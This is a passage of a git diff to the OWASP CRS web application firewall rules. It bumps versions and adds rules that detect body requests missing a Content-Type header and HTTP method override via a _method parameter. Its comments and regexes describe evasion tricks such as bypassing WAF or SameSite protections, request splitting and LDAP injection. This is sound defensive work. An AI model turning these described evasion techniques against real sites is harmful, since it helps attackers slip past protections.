tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule &ARGS "@gt %{tx.max_num_args}" \ @@ -783,7 +828,7 @@ SecRule &TX:ARG_NAME_LENGTH "@eq 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule ARGS_NAMES "@gt %{tx.arg_name_length}" \ @@ -811,7 +856,7 @@ SecRule &TX:ARG_LENGTH "@eq 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule ARGS "@gt %{tx.arg_length}" \ @@ -836,7 +881,7 @@ SecRule &TX:TOTAL_ARG_LENGTH "@eq 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule ARGS_COMBINED_SIZE "@gt %{tx.total_arg_length}" \ @@ -862,7 +907,7 @@ SecRule &TX:MAX_FILE_SIZE "@eq 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)multipart/form-data" \ @@ -889,7 +934,7 @@ SecRule &TX:COMBINED_FILE_SIZES "@eq 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule FILES_COMBINED_SIZE "@gt %{tx.combined_file_sizes}" \ @@ -929,7 +974,7 @@ SecRule REQUEST_HEADERS:Content-Type "!@rx ^[\w/.+*-]+(?:\s?;\s*(?:action|bounda tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -952,7 +997,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.content_type=|%{tx.0}|',\ chain" @@ -980,7 +1025,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.content_type_charset=|%{tx.1}|',\ chain" @@ -1007,10 +1052,54 @@ SecRule REQUEST_HEADERS:Content-Type "@rx charset.*?charset" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" +# +# Missing Content-Type Header with Request Body (Phase 2) +# +# -=[ Rule Logic ]=- +# This rule checks if the actual REQUEST_BODY_LENGTH is greater than zero +# (indicating a body was received), then verifies the existence of the +# Content-Type header. This operates in phase:2 (request body) and complements +# rule 920340 which checks in phase:1 based on the Content-Length header. +# +# This rule catches evasion attempts where: +# - The Content-Length header was omitted entirely +# - The Content-Length header was set to zero but a body was sent anyway +# - The request bypassed phase:1 checks but still contains a body +# +# Without a Content-Type header, the Request Body Processor cannot properly +# parse the body content (XML, JSON, multipart, etc.), allowing attackers to +# hide malicious payloads from inspection unless tx.enforce_bodyproc_urlencoded +# is configured. +# +# -=[ References ]=- +# https://httpwg.org/specs/rfc7231.html#header.content-type +# https://httpwg.org/specs/rfc7230.html#message.body +# +SecRule REQUEST_BODY_LENGTH "@gt 0" \ + "id:920640,\ + phase:2,\ + block,\ + t:none,\ + msg:'Content-Type header missing from request with body',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.23.0',\ + severity:'CRITICAL',\ + chain" + SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + # # Restrict protocol versions. # @@ -1029,7 +1118,7 @@ SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -1052,7 +1141,7 @@ SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.extension=.%{tx.1}/',\ chain" @@ -1080,7 +1169,7 @@ SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -1134,7 +1223,7 @@ SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.header_name_920450_%{tx.0}=/%{tx.0}/',\ chain" @@ -1168,7 +1257,7 @@ SecRule REQUEST_HEADERS:Accept-Encoding "@gt 100" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -1201,7 +1290,7 @@ SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^!\"\(\),/:-\?\[-\]\{\}]+)/(?:\* tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -1225,7 +1314,7 @@ SecRule REQBODY_PROCESSOR "!@streq JSON" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?i)\x5cu[0-9a-f]{4}" \ @@ -1250,7 +1339,7 @@ SecRule REQUEST_URI_RAW "@contains #" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -1283,13 +1372,13 @@ SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -1314,7 +1403,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,tag:'O # https://httpd.apache.org/security/CVE-2011-3192.txt -SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ +SecRule REQUEST_HEADERS:Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ "id:920200,\ phase:1,\ block,\ @@ -1329,7 +1418,7 @@ SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ chain" SecRule REQUEST_BASENAME "!@endsWith .pdf" \ @@ -1354,10 +1443,10 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ chain" - SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \ + SecRule REQUEST_HEADERS:Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \ "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" @@ -1376,7 +1465,7 @@ SecRule ARGS "@rx %[0-9a-fA-F]{2}" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153/267/120',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" @@ -1399,7 +1488,7 @@ SecRule REQUEST_URI_RAW|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10 tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1426,7 +1515,7 @@ SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'NOTICE',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.notice_anomaly_score}'" @@ -1449,7 +1538,7 @@ SecRule FILES_NAMES|FILES "@rx ['\";=\x5c]" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -1472,7 +1561,7 @@ SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.header_name_920451_%{tx.0}=/%{tx.0}/',\ chain" @@ -1501,7 +1590,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)application/x-www-form-urlencoded tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153/267/72',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ chain" SecRule REQUEST_BODY "@rx \x25" \ @@ -1509,8 +1598,56 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)application/x-www-form-urlencoded SecRule REQUEST_BODY "@validateUrlEncoding" \ "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -=[ Rule 920650: HTTP Method Override via _method Parameter ]=- +# +# The _method parameter is used by several web frameworks (Laravel, Rails, +# Symfony, CakePHP, Express.js, Phoenix, etc.) to override the HTTP method. +# This allows HTML forms to simulate PUT, PATCH, DELETE requests which are +# not natively supported by browsers. +# +# While this is legitimate framework behavior, it can be abused to: +# - Bypass WAF rules that inspect based on HTTP method +# - Bypass SameSite=Lax cookie restrictions for CSRF attacks +# - Circumvent method-based access control lists +# +# This rule detects _method parameter in both query string and request body +# when it specifies a potentially dangerous method (DELETE, PUT, PATCH, etc.). +# +# To allow _method parameter for applications that legitimately use it, +# set tx.allow_method_override_parameter=1 in crs-setup.conf (see rule 900210). +# +# References: +# - https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions +# - https://blog.mindedsecurity.com/2016/01/request-parameter-method-may-lead-to.html +# - https://www.sidechannel.blog/en/http-method-override-what-it-is-and-how-a-pentester-can-use-it +# - https://laravel.com/docs/routing#form-method-spoofing +# - https://guides.rubyonrails.org/form_helpers.html#how-do-forms-with-patch-put-or-delete-methods-work +# +SecRule TX:allow_method_override_parameter "@eq 0" \ + "id:920650,\ + phase:2,\ + block,\ + t:none,\ + msg:'HTTP method override attempt via _method parameter',\ + logdata:'Requested method override: %{ARGS._method}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.23.0',\ + severity:'CRITICAL',\ + chain" + SecRule ARGS:_method "@rx ^[a-z]{3,10}$" \ + "t:none,t:urlDecodeUni,t:lowercase,\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # @@ -1536,7 +1673,7 @@ SecRule REQUEST_URI_RAW|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateB tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -1570,7 +1707,7 @@ SecRule &REQUEST_HEADERS:Accept "@eq 0" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'NOTICE',\ chain" SecRule REQUEST_METHOD "!@rx ^(?:OPTIONS|CONNECT)$" \ @@ -1604,7 +1741,7 @@ SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \ @@ -1658,7 +1795,7 @@ SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ chain" SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(?:\s*\,\s*|$)){1,7}$" \ @@ -1689,12 +1826,12 @@ SecRule REQUEST_HEADERS:Accept-Encoding "!@rx br|compress|deflate|(?:pack200-)?g tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # @@ -1718,10 +1855,10 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'WARNING',\ chain" - SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ + SecRule REQUEST_HEADERS:Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ "setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}'" @@ -1746,7 +1883,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90 tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" @@ -1768,7 +1905,7 @@ SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!RE tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" @@ -1795,7 +1932,7 @@ SecRule REQUEST_HEADERS:Sec-Fetch-User|REQUEST_HEADERS:Sec-CH-UA-Mobile "!@rx ^( tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" @@ -1840,7 +1977,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\x5c])\x5c[cdegh tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/153/267',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" diff --git a/rules/REQUEST-921-PROTOCOL-ATTACK.conf b/rules/REQUEST-921-PROTOCOL-ATTACK.conf index 697d2335c7..29480e8ff4 100644 --- a/rules/REQUEST-921-PROTOCOL-ATTACK.conf +++ b/rules/REQUEST-921-PROTOCOL-ATTACK.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -47,7 +47,7 @@ SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connec tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -80,7 +80,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\r\n] tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/210/272/220/34',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -102,7 +102,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\bh tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/210/272/220/34',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -137,7 +137,7 @@ SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/210/272/220/273',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -166,7 +166,7 @@ SecRule ARGS_NAMES "@rx [\n\r]" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -188,7 +188,7 @@ SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cook tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -216,7 +216,7 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/210/272/220/34',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -235,7 +235,7 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \ # * https://www.sonarsource.com/blog/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/ # * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/276#issue-126581660 -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^[^:\(\)\&\|\!<>\~]*\)\s*(?:\((?:[^,\(\)\=\&\|\!<>\~]+[><~]?=|\s*[&!|]\s*(?:\)|\()?\s*)|\)\s*\(\s*[\&\|\!]\s*|[&!|]\s*\([^\(\)\=\&\|\!<>\~]+[><~]?=[^:\(\)\&\|\!<>\~]*)" \ +SecRule 